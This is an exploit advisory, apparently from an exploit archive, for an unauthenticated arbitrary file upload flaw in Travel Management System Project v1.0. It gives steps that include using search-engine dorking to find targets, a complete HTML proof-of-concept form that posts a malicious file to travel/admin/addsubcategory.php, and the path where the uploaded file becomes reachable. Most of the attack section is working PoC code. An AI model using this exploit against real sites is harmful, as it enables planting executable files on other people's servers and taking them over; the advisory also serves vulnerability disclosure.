Authored by indoushka

Travel Management System Project version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================
| # Title : Travel Management System Project v1.0 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://projectworlds.in/wp-content/uploads/2019/06/travel.zip |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 9.

[+] Set the target site link Save changes and apply .

[+] infected file : travel/admin/addsubcategory.php.


[+] save code as poc.html .

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Subcategory Form</title>
</head>
<body>
<form action="http://127.0.0.1/travel/admin/addsubcategory.php" method="POST" enctype="multipart/form-data">


<label for="t3">Upload File:</label>
<input type="file" id="t3" name="t3"><br>



<button type="submit" name="sbmt">Submit</button>
</form>
</body>
</html>


[+] http://127.0.0.1/travel/Admin/subcatimages/bad.jpg

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================